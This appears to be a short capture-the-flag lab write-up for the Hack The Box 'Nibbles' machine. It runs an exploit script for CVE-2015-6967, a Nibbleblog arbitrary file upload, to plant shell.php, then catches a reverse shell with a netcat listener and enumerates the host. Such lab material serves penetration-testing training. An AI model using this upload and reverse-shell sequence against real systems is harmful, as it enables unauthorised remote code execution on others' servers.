Nibbleblog 4.0.3 - Arbitrary File Upload (CVE-2015-6967)
┌──(kali㉿kali)-[~/archive/htb/labs/nibbles]
└─$ python cve-2015-6967.py --url http://$IP/nibbleblog/ --username admin --password nibbles --payload shell.php
[+] Login Successful.
[+] Upload likely successfull.
[+] Exploit launched, check for shell.Executing the Python script for exploitation
┌──(kali㉿kali)-[~/archive/htb/labs/nibbles]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.75] 55790
socket: Shell has connected! PID: 1623
whoami
nibbler
hostname
Nibbles
ifconfig
ens192 link encap:Ethernet HWaddr 00:50:56:b9:67:8f
inet addr:10.10.10.75 Bcast:10.10.10.255 Mask:255.255.255.0
inet6 addr: dead:beef::250:56ff:feb9:678f/64 Scope:Global
inet6 addr: fe80::250:56ff:feb9:678f/64 Scope:Link
up broadcast running multicast mtu:1500 Metric:1
rx packets:574 errors:0 dropped:0 overruns:0 frame:0
tx packets:888 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
rx bytes:71855 (71.8 KB) TX bytes:162757 (162.7 KB)
lo link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
up loopback running mtu:65536 Metric:1
rx packets:242 errors:0 dropped:0 overruns:0 frame:0
tx packets:242 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
rx bytes:19928 (19.9 KB) TX bytes:19928 (19.9 KB)Initial Foothold established as the nibbler user via exploiting CVE-2015-6967